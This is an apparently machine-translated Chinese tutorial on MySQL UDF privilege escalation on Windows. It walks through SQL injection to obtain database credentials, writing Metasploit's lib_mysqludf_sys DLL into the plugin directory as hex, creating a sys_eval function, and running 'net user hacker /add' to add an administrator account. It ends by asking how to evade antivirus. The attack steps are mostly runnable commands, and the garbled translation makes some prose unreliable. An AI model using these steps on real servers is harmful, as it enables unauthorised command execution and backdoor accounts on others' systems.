Mysql udf Raise the right

UDF

UDF yes MySQL User defined functions in . It was like DLL Write your own functions in , And then in MySQL Call them in .

Premise

1. There is sql Inject holes
2. Mysql File write read permission security_file_priv Value is empty
3. Database users have file read and write permissions
4. Database users allow other hosts to connect

step

1. utilize sql Inject to get the database user name , password , Decrypt the password to get plain text

2. Use osanda Users connect to the database

3. see osanda User's rights

select * from mysql.user where user = substring_index(user(), '@', 1) \G;

Found to have all permissions

4. Write a UDF DLL library

   Check the system architecture and type , Convenient for us to choose later udf file （ Yes 4 individual ）

show variables like '%compile%';

** from MySQL 5.0.67 Start ,UDF The library must be included in plugin In the folder , have access to ‘@@plugin_dir’ The global variable finds the folder . Can be in mysql.ini View and edit this variable in the file .** But the default is not plugin This directory

select @@plugin_dir ;

If Mysql The version is 5.1.60 The following can be used

select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib::$INDEX_ALLOCATION'; 
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION'; 

Create folder , But I tested 5.7.26 edition , These two lines sql sentence Cannot create folder 了 , May be Mysql Added a little security policy .

from MySQL 5.0.67 Start , The file must be located in the plug-in directory . The directory consists of plugin_dir The value of the system variable is given . If plugin_dir The value of is empty , Then applicable 5.0.67 Previously used behavior ： The file must be located in the directory searched by the dynamic linker of the system .

In the old version , You can use DLL Upload the file to the following location and create a new UDF function .

• @@datadir
• @@basedir\bin
• C:\windows
• C:\windows\system
• C:\windows\system32

metasploit Built in with written udf file , It can be used by us

see udf.dll The location of

You can also go to github Get on the

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

Raise the right 32 The bit system is 32, Raise the right 64 The bit system is 64,windows System selection dll,linux System selection so

take udf.dll The file is converted into hexadecimal and saved on the local computer , I save it here to F:/phpstudy_pro/WWW/ Under the table of contents

select hex(load_file('F:/phpstudy_pro/WWW/lib_mysqludf_sys_64.dll')) into dumpfile 'F:/phpstudy_pro/WWW/udf.txt';

Then the just generated udf.txt Hexadecimal number exported to the destination host plugin Directory

select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dumpfile "F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll";

There may be a mistake , Because the destination host does not plugin Catalog

At this time, create a lib/plugin Catalog

Export again and you will succeed

The destination host has udf.dll Documents are not enough , We still have to be in Mysql Create the functions you need to use

Although the author is udf.dll There are many functions defined in , But we only need one function , That is to say sys_eval()

sys_eval The role of

This function will execute system commands , And display on the screen passed to the standard output .( Follow sqlmap Of –os-shell It's about the same , however sqlmap System commands that cannot be executed , This sys_eval But it can be implemented successfully , See the effect later )

sys_eval The creation of

create function sys_eval returns string soname 'udf.dll';

sys_eval The test of

select * from mysql.func where name = 'sys_eval';

There are content , Proof of successful creation

sys_eval The deletion of

drop function sys_eval;

If you don't want to use this custom function, you can use this command to delete

Once created , You can use it

select sys_eval('dir');

Next, enter a point sqlmap Impossible orders , Don't say sqlmap 了 , Even if you execute such a command locally, you need to open the administrator identity to execute , It is Add users , And add users to the administrators group in

Use another one first cmd Look at the current users

And then I use sys_eval Function to create a user hacker

select sys_eval('net user hacker /add');

At this time, Firefox jumped out , A keen sense of smell smells something wrong , I hurriedly pressed the permission to calm his mood

The result shows a piece of garbled code , But it doesn't prevent us from adding users

Continue to view current users

More than a hacker user

The following will hacker User promoted to administrator

Use another one cmd View the users of the administrators group , Find out hacker Become an administrator ？

Is this what we often say udf Raise the right

Summary of difficulties

1. lib/plugin How to use other methods to create （ It is impossible to manually create a ）
2. How to bypass anti-virus software such as Firefox